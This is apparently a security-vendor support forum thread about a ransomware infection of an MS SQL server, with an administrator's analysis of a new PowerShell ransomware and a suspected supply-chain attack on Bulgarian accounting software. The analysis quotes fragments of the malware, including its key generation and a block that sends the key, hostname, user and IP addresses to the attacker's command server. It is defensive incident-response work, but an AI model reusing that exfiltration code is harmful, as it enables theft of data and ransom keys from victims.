Jump to content

cyberfear@decryptor


Recommended Posts

  • Administrators

First of all, you have misconfigured ESET Internet Security. Attacks were conducted against MS SQL Server running on the machine but you have configured ESET not to block them:

image.png

Also you have created an exception for 2 IP addresses blocked by ESET, one of which is a known source of attacks:
https://www.abuseipdb.com/check/198.147.26.74

The following detections were stemming from a compromised MS SQL server:

a variant of MSIL/HackTool.BadPotato.C trojan
a variant of Win64/Kryptik.EDF trojan
a variant of Win64/Agent.DJU trojan

I'd suggest to:
1, Remove all IDS exceptions
2, Supply me with :
a)
a couple of encrypted files, ideally Office documents
b) the ransomware note with payment instructions, if exists

Link to comment
Share on other sites

1 hour ago, Marcos said:

Първо, вие сте конфигурирали неправилно ESET Internet Security. Бяха извършени атаки срещу MS SQL Server, работещ на машината, но вие сте конфигурирали ESET да не ги блокира:

изображение.png

Също така сте създали изключение за 2 IP адреса, блокирани от ESET, единият от които е известен източник на атаки:
https://www.abuseipdb.com/check/198.147.26.74

Следните откривания произтичат от компрометиран MS SQL сървър:

вариант на MSIL/HackTool.BadPotato.C троянски кон
вариант на троянски кон Win64/Kryptik.EDF
вариант на троянски кон Win64/Agent.DJU

Бих предложил да:
1, Премахнете всички IDS изключения
2, Доставете ми :
а)
няколко криптирани файла, в идеалния случай Office документи
б) бележката за рансъмуер с инструкции за плащане, ако съществува

I am attaching some encrypted files and a ransomware note.

Infected.zip

Link to comment
Share on other sites

  • Administrators

Unfortunately the files didn't help to determine how files were encrypted. It could have been a ransomware or a legit encryption tool that an adversary ran after gaining access to the machine.

Link to comment
Share on other sites

  • Administrators

Just run a full disk scan to make sure that no malware is detected. You computer should be clean. The ransomware is usually removed itself or the adversary deletes it after encryption.

Link to comment
Share on other sites

1 hour ago, itman said:

Ако файловете са криптирани с рансъмуер BlackMatter, може да е възможно да ги дешифрирате: https://forum.eset.com/topic/39294-pc-infected-with-cyberfeardecryptor-sexaxglsy-files/?do=findComment&comment=178902

How do I know this?

Link to comment
Share on other sites

  • Administrators

It's a new Powershell malware, will be detected shortly as PowerShell/Filecoder.BM trojan. It was probably a targeted attack since it was not found on any other machine with ESET installed so far.

Link to comment
Share on other sites

Yes the attack is targeted, I believe it is happening through a backup program of an accounting program I use.

Link to comment
Share on other sites

9 minutes ago, Marcos said:

Това е нов злонамерен софтуер Powershell, скоро ще бъде открит като троянски кон PowerShell/Filecoder.BM. Вероятно е била целенасочена атака, тъй като досега не е открита на никоя друга машина с инсталиран ESET.

Ще бъдем ли защитени в бъдеще?

Link to comment
Share on other sites

26 minutes ago, Marcos said:

It's a new Powershell malware

Would have Eset recommended anti-ransomware rule to block any child process startup from PowerShell.exe detected and blocked  it?

Link to comment
Share on other sites

  • Administrators

The PowerShell script infects local MS SQL databases by running "sqlcmd -S localhost ..." except 'master', 'tempdb', 'model', 'msdb'. Unfortunately the encryption key is random:

$PSRKey = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 24 | % {[char]$_})

and is sent to the attacker's C&C server:

    $C2Data = @"
    [>] Key: $PSRKey
    [>] Hostname: $computer
    [>] Current User: $domain$user
    [>] Current Time: $time
    [>] Local IP: $localIP
    [>] Public IP: $publicIP
"@

     $url = "http://$C2Server`:$C2Port/data"

 

Link to comment
Share on other sites

Posted (edited)

Perhaps Mallox ransomware;

Quote

The attacker created a stored procedure named cmd_exec that calls the SqlShell malware.

Finally, it called the stored procedure to execute a command passed in parameter which performs the following actions:

  • Using echo and redirect, it creates a PowerShell script that downloads a binary and saves it to the ProgramData folder;
  • It then calls PowerShell to execute the script;
  • Finally, It uses WMIC to execute the binary.

https://blog.sekoia.io/mallox-ransomware-affiliate-leverages-purecrypter-in-microsoft-sql-exploitation-campaigns/

Edited by itman
Link to comment
Share on other sites

On 5/19/2024 at 4:20 PM, ivaylogrig said:

I am attaching some encrypted files and a ransomware note.

Infected.zip

Can you upload these files to a cloud drive: Google or Yandex, and provide a link to download and determine the type of ransomware based on the encrypted file and the ransom note?

Link to comment
Share on other sites

  • Administrators

It appears there has been a supply chain attack going on and targeting users of the Bulgarian accounting software Microinvest that uses SQL Express.

Link to comment
Share on other sites

Posted (edited)
3 hours ago, Marcos said:

It appears there has been a supply chain attack going on and targeting users of the Bulgarian accounting software Microinvest that uses SQL Express.

The beginnings of another infamous Petya-like attack?

Quote

It was believed that the software update mechanism of M.E.Doc [uk]—a Ukrainian tax preparation program that, according to F-Secure analyst Mikko Hyppönen, "appears to be de facto" among companies doing business in the country—had been compromised to spread the malware.[13][18][19] Analysis by ESET found that a backdoor had been present in the update system for at least six weeks prior to the attack, describing it as a "thoroughly well-planned and well-executed operation".[20] The developers of M.E.Doc denied that they were entirely responsible for the cyberattack, stating that they too were victims.[18][21][22][23]

https://en.wikipedia.org/wiki/Petya_(malware_family)

Edited by itman
Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...